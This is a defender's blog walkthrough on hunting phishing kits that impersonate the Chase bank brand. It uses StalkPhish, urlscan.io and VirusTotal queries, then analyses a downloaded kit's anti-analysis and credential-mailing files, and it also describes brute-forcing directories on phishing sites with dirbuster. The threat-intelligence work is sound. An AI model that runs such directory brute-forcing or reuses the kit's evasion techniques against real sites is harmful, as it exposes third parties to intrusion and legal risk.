Brand Protection & Hunting for Phishing Kits
Moving into the Cyber Threat Intelligence space not long ago one of the gaps I was able to immediately identify was around valuable phishing Intel. Not so much the discovery of phishing sites impersonating your brand, but how to attribute it to specific threat actors or phishing kits and spread awareness around the techniques the attackers are using when trying to phish their victims.
Phishing kits are basically software packages that are sold to attackers that make it easy to spin up a phishing site to capture credentials. They generally aim to spoof a number of popular brands allowing attackers to avoid spending time on much of the grunt work.
It’s still a major challenge as most of the vendors I have experience with don’t do a lot outside of discovery. You will be able to identify typosquat domains based on keywords or other key attributes such as logo or image usage, but so many other questions seem to go unanswered. Another challenge includes when domains are registered, they aren’t necessarily weaponized or infringing on your brand, so you’re staring at placeholders and essentially have to go into monitoring mode until actions can be taken.
Leading into the discussion I want to share a good report from 2018 on phishing kits published by security company, Imperva. Their report includes a few key elements that help guide our research into the discovery and analysis of phishing sites. These include:
- Analysis sources
- Common techniques
- Presence of the kit author’s signature
- Buyer information
There are likely a number of methods we can use to discover and analyze kits in the wild but I’ll discuss the one that I tend to use that works for me.
The tool we’re going to examine for initial discovery is called StalkPhish.
For updated information on installation please visit the readme on the git page.
StalkPhish leverages a number of OSINT APIs to identify phishing sites such as urlscan.io, urlquery, Phishtank, Openphish and PhishStats. You can define keywords and activate modules via the config file. The image below shows a portion of the example.conf where you can get started. If you aren’t searching a specific keywords and using a list of keywords you can define them here.
For the purpose of this walk-though I used keywords such as chase and chasebank to attempt to discover sites impersonating the Chase brand.
The following command tells StalkPhish to use our example.conf file and attempt to pull zip files containing sources if discovered.
Depending on your query and whether or not you choose to search for .zip files the script can take a bit of time to complete. Once it does, the results will be stored in the sqlite database. It’s normal to run into some false positives depending on your search keywords, however some sites do stand out more than others. First, you can sort by HTTP 200 responses to focus on sites that are still active. From there, you can look to investigate those what stand out by blatantly impersonating a specific brand or those with commonalities such as the sites highlighted in the screenshot below. They appear to use a similar kit judging by the names of the pages.
We can confirm our assumptions by taking a look at a site that both clearly impersonates the brand and has characteristics of potential kits.
What’s next? Well, there’s a few different things you can do at this point. Since we’re already at the site, I like to simply review the HTML source in the browser to get an idea of how the site functions. Most of the time you’ll see the field values passed to back-end PHP pages that aren’t accessible for analysis as is the case here.
All is not lost, however. There are some ways to pivot off of this information to further our investigation. We can expand our search using various OSINT sources as well as do some checks for open directories.
We already suspect this may be a phishing kit in play so if we search some common indicators we can expect to see other phishing sites using similar pages. We can confirm this using the urlscan.io service.
We can search keywords like need3.php or surf*.php and get a number of hits.
Here is a sample search
page.url:”surf.php” OR page.url:”need3.php” OR page.url:”surf2.php” OR page.url:”surf3.php” OR page.url:”surf4.php”
If you expand the search using the one provided above you’ll get thousands of results. A quick glance gives you a pretty good idea that many of the results are popular bank phishing sites.
The problem still exists in that we can’t actually see what the .php files are doing so it’s difficult for us to determine things such as the buyer or author information, but maybe we can further our OSINT searches to gather some kit info.
You can search Google for keywords like need3.php combined with opendir and you’ll probably find a few public sandbox reports. Here’s an example from any.run submissions.
https://app.any.run/tasks/51e2777e-825a-4575-a2ea-8f819a413484/#
Despite it being tagged as opendir it appears to be referring to some images rather than access to the php files so we turned a bit of a dead end here, which unfortunately happens from time to time and that’s alright. We’re not done yet, though. We can try searching Virustotal for our keywords as well(not sure if this capability exists only with VT Intelligence subscriptions). At any rate, searching for need3.php generates a number of results. In particular, I’m interested in the .zip files since they could contain complete kits. We can also refine our search further to something like ‘entity:file tag:”zip” AND need3.php’
Interestingly we already see results that are geared toward Chase zip files.
Taking a random file with a number of detection engines classifying it as some sort of Phishing signature we can see some of the contents is aligned with the kits we wish to explore.
If you don’t have a VT Intel account you can search hashes on other public sources that may give you the ability to download the files for further analysis. Downloading this zip and moving it to our analysis environment we can collect some relevant information.
First, the htaccess file is denying access to a number of IP addresses.
If you wish, you can lookup who owns these IP ranges to try and make the determination on who exactly the kit is attempting to deny access.
Browsing other files we can see some additional anti-analysis techniques in play. Here is a snippet from the hostname.php file.
It looks like the kit attempts to prevent access to some common brand & phish protection vendors.
Next we’ll look at a few files that we pointed out previous in our initial discovery. More specifically, the need3.php file. We can see a number of variables defined that give us an idea of the type of information the kit is collecting and additional functionality.
You’ll also notice the inclusion of the email.php file. Looking at this file we hit the jackpot. Granted, this isn’t necessarily the same buyer from the sites we discovered, but it allows us to understand the full functionality nevertheless.
You can use the email address not only from an Intel perspective but to report abuse and have the address taken down hopefully limiting impact of potential victims.
An additional piece of the puzzle is kit attribution, which unfortunately we weren’t able to obtain with this specific kit/zip archive. You can certainly research similar files to try and determine if any of them do in fact contain some sort of author info.
We were able to collect a lot of this information using open source services, however what if you wanted to gather information yourself? Well, we already spoke about how StalkPhish has the capability to pull down zip files it finds. Another tool that’s part of Kali Linux is dirbuster.
Dirbuster attempts to brute force directory structures on specified sites that could help yield valuable information. There’s been plenty of times where less sophisticated kits and attackers who failed to secure their phishing sites leave valuable accessible artifacts on the sites that includes text files of username/password combos of victims.
Dirbuster is easy enough to use. Input the URL and select the word list you wish to use. You can speed up the process by increasing the number of threads, but keep in mind sometimes this raises alarm bells and could get your IP blocked if it triggers any security controls. You also have the capability to use this tool over a proxy in the event this occurs or you need some sort of anonymity.
Remember, using tools like may be considered “hacking back” and running them against sites, regardless of their intent, could be trouble. This is specifically meant to educate you on the capabilities available.
We were able to gather a decent amount of intelligence from this process that can expand the type of actors and threats tracked as part of our Intel process. I’m sure there’s plenty of techniques and things I may be missing, but I hope that this at least helps provide a good starting point for collecting and analyzing phishing threats against your brand.
